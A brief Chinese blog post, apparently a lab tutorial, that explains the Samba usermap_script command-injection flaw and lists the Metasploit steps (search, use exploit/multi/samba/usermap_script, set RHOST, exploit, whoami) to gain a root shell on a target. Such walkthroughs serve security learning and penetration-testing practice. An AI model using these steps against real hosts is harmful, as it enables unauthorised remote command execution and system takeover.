Metasploit溢出Samba提权漏洞

目的

利用Samba漏洞,获得目标主机root权限.

原理

Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh.如果再调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了而已输入的话,就可能允许攻击者以nobody用户的权限执行任意命令.Samba服务端口:139\445.


攻击环境

步骤

  1. 如前面几个:扫端口,看服务,查版本,找漏洞.
  2. 依次执行:msfconsole --> search samba --> use exploit/multi/samba/usermap_script --> info --> set RHOST 192.168.1.3(目标ip) --> exploit --> whoami(输入命令getshell)
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

友情链接更多精彩内容